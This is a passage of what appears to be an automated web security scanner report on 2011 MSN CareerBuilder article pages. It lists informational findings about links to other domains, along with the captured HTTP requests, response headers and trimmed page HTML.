http://login.live.com/login.srf?wa=wsignin1.0&rpsnv=10&ct=1178121103&rver=4.0.1532.0&wp=LBI&wreply=http:%2F%2Fcareers.redacted%2F&lc=1033&id=74314
http://money.redacted/auto-insurance/7-ways-to-overpay-for-car-insurance-insure.aspx
http://moneycentral.msn.com/detail/stock_quote
http://moneycentral.msn.com/home.asp
http://moneycentral.msn.com/investor/home.aspx
http://moneycentral.msn.com/personal-finance/
http://movies.redacted/
http://movies.redacted/new-on-dvd/movies/
http://msn.empleoscb.com/
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/golf
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalcareers.112.2o7.net/b/ss/msnportalcareers/1/H.1--NS/0
http://music.redacted/
http://my.redacted/
http://rad.redacted/ADSAdClient31.dll?GetAd?PG=CCHAPR?PS=45019?PI=7327?NC=1154?AP=1417?SC=D1
http://realestate.redacted/
http://realestate.redacted/article.aspx?cp-documentid=27225933
http://reddit.com/submit?url=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=1391&catid=js&title=9 Questions You Should Ask Your Boss
http://rss.redacted/
http://sc2.sclive.net/00.0.0000.0000/Web/images/spacesicon16.gif
http://sp.reddit.com/reddithead4.gif
http://spaces.live.com/BlogIt.aspx?Title=9 Questions You Should Ask Your Boss&SourceURL=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=1391&catid=js
http://specials.redacted/alphabet.aspx
http://static.ak.fbcdn.net/images/share/facebook_share_icon.gif
http://thebubble.redacted/
http://today.msnbc.msn.com/
http://tv.redacted/
http://wonderwall.redacted/
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search
http://www.bing.com/search?FORM=AP
http://www.bing.com/search?q=valentine%27s+day+gift+ideas&form=ap
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.cbsalary.com/calculators.aspx?lr=cbmsn&siteid=cbmsn_3calc
http://www.delish.com/
http://www.delish.com/food-fun/best-burgers
http://www.facebook.com/sharer.php?u=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=1391&catid=js&t=9 Questions You Should Ask Your Boss
http://www.redacted/
http://www.msnbc.redacted/
http://www.msnbc.redacted/id/3032072/ns/business
http://www.msnbc.redacted/id/3032076/ns/health
http://www.msnbc.redacted/id/3032118/ns/technology_and_science
http://www.msnbc.redacted/id/3032507/ns/world_news
http://www.msnbc.redacted/id/3032525/ns/us_news
http://www.msnbc.redacted/id/3032553/ns/politics
http://www.msnbc.redacted/id/3032619/ns/nightly_news/
http://www.msnbc.redacted/id/8004316/?from=en-us_msnhp
http://www.myhomeredacted/
http://www.stumbleupon.com/images/icon_su.gif
http://www.stumbleupon.com/submit?url=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=1391&catid=js&title=9 Questions You Should Ask Your Boss
http://yellowpages.msn.com/
http://zone.redacted/en-us/home
https://secure.icbdr.com/images/custom/msn/wcareerbuilder-com.gif
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /Article/MSN-1391-Workplace-Issues-Nine-Questions-You-Should-Ask-Your-Boss/?SiteId=cbmsnjm41391&sc_extcmp=JS_1391_jobmod HTTP/1.1
Host: msn.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 60961
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=674c5ead2af04f018f7a06a3d6249272-349642137-wm-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X1974D75CFDC14C8421247E30C7ABBCDCC0B40EE50661089478D9F1B0457BD5D042FFB1FA0100B1D0E1E74E64E4F642BE1; domain=.careerbuilder.com; expires=Sun, 29-Jan-2012 23:48:56 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: BEAR23
Date: Sat, 29 Jan 2011 23:48:56 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   MSN Ca
...[SNIP]...
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"><link rel="stylesheet" type="text/css" href="http://img.icbdr.com/v11.89/css/cbglobal.css" /><link rel="stylesheet" type="text/css" href="http://img.icbdr.com/v11.89/css/msncareeradvice.css" /><link rel="stylesheet" type="text/css" href="http://img.icbdr.com/v11.89/css/msn_full.css" /><script type="text/javascript">
...[SNIP]...
</script><script type="text/javascript" src="http://img.icbdr.com/Common/js/cblibraryajaxbase.min.js"></script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/jquery-1.3.2.min.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/4/mozcompat.js">
</script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.redacted/br/voodoo/js/9/core.js "></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/core.js"></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/2/report.js"></script>
<script type="text/javascript" src="http://ads1.redacted/library/dap.js"></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
<div id="reporting">
<img id="ctag" width="1" height="1" alt="" src="http://c.redacted/c.gif?di=15128&pi=7327&ps=45019&tp=http://specials.redacted/mopsdk/standard/careers/msnshell.aspx&rf=" />

<script type="text/javascript" src="http://hp.redacted/scr/op/ol-fdbkv3_r1.js"></script>
...[SNIP]...
<li class="c1"><a href="http://www.msnbc.redacted/">News</a>
...[SNIP]...
<li class="first"><a href="http://www.msnbc.redacted/id/3032076/ns/health">Health News</a>
...[SNIP]...
<li><a href="http://local.msn.com/news.aspx"><strong>
...[SNIP]...
<li><a href="http://www.msnbc.redacted/id/3032619/ns/nightly_news/">NBC Nightly News</a>
...[SNIP]...
<li><a href="http://www.msnbc.redacted/id/3032553/ns/politics">Politics</a></li><li><a href="http://www.msnbc.redacted/id/3032118/ns/technology_and_science">Tech & Science</a>
...[SNIP]...
<li><a href="http://today.msnbc.redacted/">Today Show</a></li><li><a href="http://www.msnbc.redacted/id/3032525/ns/us_news">US News</a></li><li><a href="http://www.msnbc.redacted/id/8004316/?from=en-us_msnhp">Video</a></li><li><a href="http://local.msn.com/weather.aspx">Weather</a></li><li><a href="http://www.msnbc.redacted/id/3032507/ns/world_news">World News</a>
...[SNIP]...
<li class="c2"><a href="http://entertainment.redacted/">Entertainment</a>
...[SNIP]...
<li class="first"><a href="http://wonderwall.redacted/"><strong>
...[SNIP]...
<li><a href="http://thebubble.redacted/ ">Comedy</a></li><li><a href="http://entertainment.redacted/news/?ipp=15">Entertainment News </a>
...[SNIP]...
<li><a href="http://zone.redacted/en-us/home">Games</a></li><li><a href="http://movies.msn.com/">Movies</a></li><li><a href="http://music.msn.com/">Music</a></li><li><a href="http://movies.msn.com/new-on-dvd/movies/">New on DVD</a></li><li><a href="http://tv.redacted/"> TV</a></li><li><a href="http://entertainment.redacted/video/?from=en-us_msnhp"> Video</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/golf">Golf</a></li><li><a href="http://msn.foxsports.com/mlb"> MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li class="c4"><a href="http://moneycentral.redacted/home.asp">Money</a>
...[SNIP]...
<li class="first"><a href="http://autos.msn.com/">Autos</a></li><li><a href="http://www.msnbc.redacted/id/3032072/ns/business">Business News</a>
...[SNIP]...
<li><a href="http://moneycentral.redacted/investor/home.aspx">Investing</a></li><li><a href="http://moneycentral.redacted/personal-finance/">Personal Finance</a>
...[SNIP]...
<li><a href="http://moneycentral.redacted/detail/stock_quote"><strong>
...[SNIP]...
<li><a href="http://realestate.redacted/">Real Estate & Rentals</a>
...[SNIP]...
<li><a href="http://articles.redacted/video/default.aspx?from=en-us_msnhp">Video</a>
...[SNIP]...
<li class="c5"><a href="http://lifestyle.redacted/">Lifestyle</a>
...[SNIP]...
<li class="first"><a href="http://lifestyle.redacted/your-look/">Beauty & Fashion</a>
...[SNIP]...
<li><a href="http://www.delish.com/"><strong>
...[SNIP]...
<li><a href="http://lifestyle.redacted/your-home/">Decor & Organizing</a>
...[SNIP]...
<li><a href="http://glo.redacted/">Glo: For Her</a>
...[SNIP]...
<li><a href="http://health.msn.com/">Health, Diet & Fitness</a>
...[SNIP]...
<li><a href="http://astrocenter.astrology.redacted/msn/DeptHoroscope.aspx?When=0&Af=-1000&VS">Horoscopes</a></li><li><a href="http://lifestyle.redacted/relationships/">Love & Relationships</a>
...[SNIP]...
<li><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670269">Online Dating</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a></li><li><a href="http://lifestyle.redacted/your-look/video/?from=en-us_msnhp">Video</a>
...[SNIP]...
<li class="c6 last fluid"><a href="http://specials.msn.com/alphabet.aspx">More</a>
...[SNIP]...
<li class="first"><a href="http://autos.msn.com/">Autos</a></li><li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a></li><li><a href="http://careers.msn.com/">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://my.redacted/">My MSN</a></li><li><a href="http://local.msn.com/weather.aspx">Weather</a></li><li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268">Personals</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://zone.redacted/en-us/home"><strong>
...[SNIP]...
<li><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li><li><a href="http://wonderwall.redacted/">Wonderwall</a></li><li><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li><li><a href="http://realestate.redacted/">Real Estate/Rentals</a>
...[SNIP]...
<li><a href="http://yellowpages.redacted/">Yellow Pages</a>
...[SNIP]...
<li><a href="http://latino.msn.com/">Latino</a></li><li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a></li><li><a href="http://local.msn.com/news.aspx">Local Edition</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a></li><li><a href="http://specials.msn.com/alphabet.aspx">Full MSN Index</a>
...[SNIP]...
<span class="blogo">
<a href="http://www.bing.com/search?FORM=AP">Bing</a>
...[SNIP]...
<li class="first">
<a href="http://hotmail.msn.com">Hotmail</a>
...[SNIP]...
<li id="msg">
<a href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<li class="last">
<a href="http://login.live.com/login.srf?wa=wsignin1.0&rpsnv=10&ct=1178121103&rver=4.0.1532.0&wp=LBI&wreply=http:%2F%2Fcareers.redacted%2F&lc=1033&id=74314">Sign in</a>
...[SNIP]...
<div id="logo">
<a href="http://www.redacted">
<img id="msnlogo" src="http://blstc.redacted/br/gbl/lg/1/t/msft.png" title="go to redacted" alt="go to redacted" />
</a>
...[SNIP]...
<div>
<a href="http://www.bing.com/search" id="wslink1">Search the web</a>
...[SNIP]...
<div id="optlinks" class="link">
<a href="http://msn.empleoscb.com/">Espa..ol</a>
...[SNIP]...
<strong>
<a href="http://careers.msn.com">Careers</a>
</strong>
<a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div id="partnerlogo" style="padding: 15px 0 10px 10px; font-family: Tahoma, Arial, Sans-Serif; color:#006699;">

            <img src="https://secure.icbdr.com/images/custom/msn/wcareerbuilder-com.gif" id="Img1" alt="CareerBuilder.com" />
            <div id="partnerlinks" style="padding: 10px 0 5px 0;">
...[SNIP]...
<li class="first"><a href="http://careers.msn.com/">Home</a>
...[SNIP]...
<li><a id="Cbhyperlink6" href="http://www.cbsalary.com/calculators.aspx?lr=cbmsn&siteid=cbmsn_3calc" target="_blank">Salary Calculators</a>
...[SNIP]...
<li><a id="Cbhyperlink19" href="http://careerpath.com/career-tests/?lr=cbmsn&siteid=cbmsnchcpath" target="_blank">Career Tests</a>
...[SNIP]...
</select>
                                <img src="http://img.icbdr.com/images/pixel.gif" id="qsbNEW_Img1" width="1" hspace="1" height="10" />
                            </td>
...[SNIP]...
<li><a href="http://www.stumbleupon.com/submit?url=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=1391&catid=js&title=9 Questions You Should Ask Your Boss"> <img border=0 src="http://www.stumbleupon.com/images/icon_su.gif" alt="StumbleUpon"> Stumble It!</a>
...[SNIP]...
<li><a href="http://www.facebook.com/sharer.php?u=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=1391&catid=js&t=9 Questions You Should Ask Your Boss"> <img border=0 src="http://static.ak.fbcdn.net/images/share/facebook_share_icon.gif" alt="Facebook"> Facebook</a>
...[SNIP]...
<li><a href="http://del.icio.us/post?noui&v=4&jump=close&url=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=1391&catid=js&title=9 Questions You Should Ask Your Boss"> <img border=0 src="http://images.del.icio.us/static/img/delicious.small.gif" alt="del.icio.us"> del.icio.us</a>
...[SNIP]...
<li><a href="http://spaces.live.com/BlogIt.aspx?Title=9 Questions You Should Ask Your Boss&SourceURL=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=1391&catid=js"> <img border=0 src="http://sc2.sclive.net/00.0.0000.0000/Web/images/spacesicon16.gif" alt="Live Spaces"> Live Spaces</a>
...[SNIP]...
<li><a href="http://digg.com/submit?phase=2&url=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=1391&catid=js&title=9 Questions You Should Ask Your Boss"> <img border=0 src="http://digg.com/img/digg-it-tiny-submit.gif" alt="Digg"> Digg It!</a>
...[SNIP]...
<li><a href="http://reddit.com/submit?url=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=1391&catid=js&title=9 Questions You Should Ask Your Boss"> <img border=0 src="http://sp.reddit.com/reddithead4.gif" alt="Reddit"> reddit</a>
...[SNIP]...
<div style="float: left; height: 30px; line-height: 30px;">
        <img src="http://img.icbdr.com/images/custom/msn/cbmsn_viewarticle_print_icon.gif" border="0" style="margin-top: 2px;" /><a id="hlPrinterLinkNEW" onclick="javascript:window.open('/Article/MSN-1391-Workplace-Issues-Nine-Questions-You-Should-Ask-Your-Boss/?SiteId=cbmsnjm41391&sc_extcmp=JS_1391_jobmod&pf=true', 'pri
...[SNIP]...
<a href="mailto:?body=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=1391&catid=js"><img src="http://img.icbdr.com/images/custom/msn/cbmsn_viewarticle_email_icon.gif" border="0" /> E-mail</a>
...[SNIP]...
<div style="float: left; height: 30px; line-height: 30px; margin-top: 4px !ie; _margin-top: 0;">
        <img src="http://img.icbdr.com/images/custom/msn/cbmsn_viewarticle_discuss_icon.gif" border="0" style="float: left; margin-top: 5px;" />
        <a onClick="popupDiscuss();" style="cursor: pointer;">
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTE5ODE5NTI3MjNkZH92Tm4x0BRcNLkPDvNpw+PPA2mW" />


<script src="http://img.icbdr.com/Common/js/AJAXLibs/System.Web.Extensions/3.5.0.0/3.5.30729.196/MicrosoftAjax.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v11.89/Common/js/cbatlascore.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v11.89/Common/js/msnviewarticle.js" type="text/javascript"></script>
...[SNIP]...
</center>
<iframe scrolling="no" width="300" height="250" marginheight="0" marginwidth="0" frameborder="0" framespacing="0" src="http://rad.redacted/ADSAdClient31.dll?GetAd?PG=CCHAPR?PS=45019?PI=7327?NC=1154?AP=1417?SC=D1"></iframe>
...[SNIP]...
<li><a href="http://lifestyle.redacted/your-look/everyday-style/staticslideshowlucky.aspx?cp-documentid=26466635">A decade of game-changing fashion moments</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=valentine%27s+day+gift+ideas&form=ap">Bing: Valentine's day gift ideas</a>
...[SNIP]...
<li><a href="http://editorial.autos.redacted/listarticle.aspx?cp-documentid=1176914">10 safe and reliable cars for teens</a>
...[SNIP]...
<li><a href="http://realestate.redacted/article.aspx?cp-documentid=27225933">America's best places to raise kids</a>
...[SNIP]...
<li><a href="http://money.msn.com/auto-insurance/7-ways-to-overpay-for-car-insurance-insure.aspx">7 ways to overpay for car insurance</a>
...[SNIP]...
<li><a href="http://www.delish.com/food-fun/best-burgers">The 25 best burgers in the U.S.</a>
...[SNIP]...
<li><a href="http://health.msn.com/health-topics/quit-smoking/slideshow.aspx?cp-documentid=100268836">Top 5 habits that harm your heart</a>
...[SNIP]...
<li class="first">
<a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN Privacy</a>
...[SNIP]...
<li>
<a href="http://g.redacted/0TO_/enus">Legal</a>
</li>
<li>
<a href="http://advertising.redacted/msn">Advertise on MSN</a>
...[SNIP]...
<li class="last">
<a href="http://rss.redacted/">RSS</a>
...[SNIP]...
<li class="last">
<a href="http://g.redacted/AIPRIV/en-us">About our ads</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>


<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/6/linktracking.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://blstj.redacted/br/chan/om/js/s_code.2010.12.13.js"></script>
...[SNIP]...
<noscript><img src = "http://msnportalcareers.112.2O7.net/b/ss/msnportalcareers/1/H.1--NS/0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

22.233. http://msn.careerbuilder.com/Article/MSN-1951-Job-Search-Get-Paid-to-Socially-Network/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msn.careerbuilder.com
Path:	/Article/MSN-1951-Job-Search-Get-Paid-to-Socially-Network/

Issue detail

The page was loaded from a URL containing a query string:

http://msn.careerbuilder.com/Article/MSN-1951-Job-Search-Get-Paid-to-Socially-Network/?SiteId=cbmsnjm41951&sc_extcmp=JS_1951_jobmod

The response contains the following links to other domains:

http://ads1.redacted/library/dap.js
http://advertising.msn.com/msn
http://articles.redacted/video/default.aspx?from=en-us_msnhp
http://astrocenter.astrology.redacted/
http://astrocenter.astrology.redacted/msn/DeptHoroscope.aspx?When=0&Af=-1000&VS
http://autos.redacted/
http://b.scorecardresearch.com/p?c1=2&c2=&c3=&c4=&c5=&c6=&c15=&cj=1
http://blstc.redacted/br/gbl/lg/1/t/msft.png
http://blstj.redacted/br/chan/om/js/s_code.2010.12.13.js
http://blstj.redacted/br/gbl/js/2/report.js
http://blstj.redacted/br/gbl/js/4/mozcompat.js
http://blstj.redacted/br/gbl/js/6/linktracking.js
http://blstj.redacted/br/gbl/js/7/core.js
http://blstj.redacted/br/gbl/js/7/jquery-1.3.2.min.js
http://blstj.redacted/br/gbl/js/7/navigation.js
http://blstj.redacted/br/voodoo/js/9/core.js
http://c.redacted/c.gif?di=15128&pi=7327&ps=45019&tp=http://specials.msn.com/mopsdk/standard/careers/msnshell.aspx&rf=
http://careerpath.com/career-tests/?lr=cbmsn&siteid=cbmsnchcpath
http://careers.redacted/
http://dating.redacted/index.aspx?TrackingID=516163&BannerID=670268
http://dating.redacted/index.aspx?TrackingID=516163&BannerID=670269
http://del.icio.us/post?noui&v=4&jump=close&url=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=1951&catid=js&title=Get Paid to Socially Network
http://digg.com/img/digg-it-tiny-submit.gif
http://digg.com/submit?phase=2&url=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=1951&catid=js&title=Get Paid to Socially Network
http://download.live.com/?sku=messenger
http://editorial.autos.redacted/listarticle.aspx?cp-documentid=1176914
http://emj.icbdr.com/artieimages/70/ar5b5t06t3h1zsd1yx70.gif
http://entertainment.msn.com/
http://entertainment.msn.com/news/?ipp=15
http://entertainment.msn.com/video/?from=en-us_msnhp
http://g.redacted/0TO_/enus
http://g.redacted/AIPRIV/en-us
http://glo.redacted/
http://go.microsoft.com/fwlink/?LinkId=74170
http://health.redacted/
http://health.redacted/health-topics/quit-smoking/slideshow.aspx?cp-documentid=100268836
http://hotmail.redacted/
http://hp.redacted/scr/op/ol-fdbkv3_r1.js
http://images.del.icio.us/static/img/delicious.small.gif
http://img.icbdr.com/Common/js/AJAXLibs/System.Web.Extensions/3.5.0.0/3.5.30729.196/MicrosoftAjax.js
http://img.icbdr.com/Common/js/cblibraryajaxbase.min.js
http://img.icbdr.com/images/custom/msn/cbmsn_viewarticle_discuss_icon.gif
http://img.icbdr.com/images/custom/msn/cbmsn_viewarticle_email_icon.gif
http://img.icbdr.com/images/custom/msn/cbmsn_viewarticle_print_icon.gif
http://img.icbdr.com/images/pixel.gif
http://img.icbdr.com/v11.89/Common/js/cbatlascore.js
http://img.icbdr.com/v11.89/Common/js/msnviewarticle.js
http://img.icbdr.com/v11.89/css/cbglobal.css
http://img.icbdr.com/v11.89/css/msn_full.css
http://img.icbdr.com/v11.89/css/msncareeradvice.css
http://latino.redacted/
http://lifestyle.redacted/
http://lifestyle.redacted/relationships/
http://lifestyle.redacted/your-home/
http://lifestyle.redacted/your-look/
http://lifestyle.redacted/your-look/everyday-style/staticslideshowlucky.aspx?cp-documentid=26466635
http://lifestyle.redacted/your-look/video/?from=en-us_msnhp
http://local.redacted/news.aspx
http://local.redacted/weather.aspx
http://login.live.com/login.srf?wa=wsignin1.0&rpsnv=10&ct=1178121103&rver=4.0.1532.0&wp=LBI&wreply=http:%2F%2Fcareers.redacted%2F&lc=1033&id=74314
http://money.redacted/auto-insurance/7-ways-to-overpay-for-car-insurance-insure.aspx
http://moneycentral.msn.com/detail/stock_quote
http://moneycentral.msn.com/home.asp
http://moneycentral.msn.com/investor/home.aspx
http://moneycentral.msn.com/personal-finance/
http://movies.redacted/
http://movies.redacted/new-on-dvd/movies/
http://msn.empleoscb.com/
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/golf
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalcareers.112.2o7.net/b/ss/msnportalcareers/1/H.1--NS/0
http://music.redacted/
http://my.redacted/
http://rad.redacted/ADSAdClient31.dll?GetAd?PG=CCHAPR?PS=45019?PI=7327?NC=1154?AP=1417?SC=D1
http://realestate.redacted/
http://realestate.redacted/article.aspx?cp-documentid=27225933
http://reddit.com/submit?url=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=1951&catid=js&title=Get Paid to Socially Network
http://rss.redacted/
http://sc2.sclive.net/00.0.0000.0000/Web/images/spacesicon16.gif
http://sp.reddit.com/reddithead4.gif
http://spaces.live.com/BlogIt.aspx?Title=Get Paid to Socially Network&SourceURL=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=1951&catid=js
http://specials.redacted/alphabet.aspx
http://static.ak.fbcdn.net/images/share/facebook_share_icon.gif
http://thebubble.redacted/
http://today.msnbc.msn.com/
http://tv.redacted/
http://wonderwall.redacted/
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search
http://www.bing.com/search?FORM=AP
http://www.bing.com/search?q=valentine%27s+day+gift+ideas&form=ap
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.cbsalary.com/calculators.aspx?lr=cbmsn&siteid=cbmsn_3calc
http://www.delish.com/
http://www.delish.com/food-fun/best-burgers
http://www.facebook.com/sharer.php?u=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=1951&catid=js&t=Get Paid to Socially Network
http://www.redacted/
http://www.msnbc.redacted/
http://www.msnbc.redacted/id/3032072/ns/business
http://www.msnbc.redacted/id/3032076/ns/health
http://www.msnbc.redacted/id/3032118/ns/technology_and_science
http://www.msnbc.redacted/id/3032507/ns/world_news
http://www.msnbc.redacted/id/3032525/ns/us_news
http://www.msnbc.redacted/id/3032553/ns/politics
http://www.msnbc.redacted/id/3032619/ns/nightly_news/
http://www.msnbc.redacted/id/8004316/?from=en-us_msnhp
http://www.myhomeredacted/
http://www.stumbleupon.com/images/icon_su.gif
http://www.stumbleupon.com/submit?url=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=1951&catid=js&title=Get Paid to Socially Network
http://www.theworkbuzz.com/
http://yellowpages.msn.com/
http://zone.redacted/en-us/home
https://secure.icbdr.com/images/custom/msn/wcareerbuilder-com.gif
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB
https://twitter.com/CBwriterRZ

Request

GET /Article/MSN-1951-Job-Search-Get-Paid-to-Socially-Network/?SiteId=cbmsnjm41951&sc_extcmp=JS_1951_jobmod HTTP/1.1
Host: msn.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 61888
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=2d280062b9e04d5ba7e3d8a3d3f6d24f-349642128-w8-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X1974D75CFDC14C8429FCCFA0CD930B672A7C9FD0DEECE0619B86D02C8AA139D336E1CE3EEE6BF984359F29590997384E8; domain=.careerbuilder.com; expires=Sun, 29-Jan-2012 23:48:47 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: BEAR8
Date: Sat, 29 Jan 2011 23:48:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   MSN Ca
...[SNIP]...
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"><link rel="stylesheet" type="text/css" href="http://img.icbdr.com/v11.89/css/cbglobal.css" /><link rel="stylesheet" type="text/css" href="http://img.icbdr.com/v11.89/css/msncareeradvice.css" /><link rel="stylesheet" type="text/css" href="http://img.icbdr.com/v11.89/css/msn_full.css" /><script type="text/javascript">
...[SNIP]...
</script><script type="text/javascript" src="http://img.icbdr.com/Common/js/cblibraryajaxbase.min.js"></script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/jquery-1.3.2.min.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/4/mozcompat.js">
</script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.redacted/br/voodoo/js/9/core.js "></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/core.js"></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/2/report.js"></script>
<script type="text/javascript" src="http://ads1.redacted/library/dap.js"></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
<div id="reporting">
<img id="ctag" width="1" height="1" alt="" src="http://c.redacted/c.gif?di=15128&pi=7327&ps=45019&tp=http://specials.redacted/mopsdk/standard/careers/msnshell.aspx&rf=" />

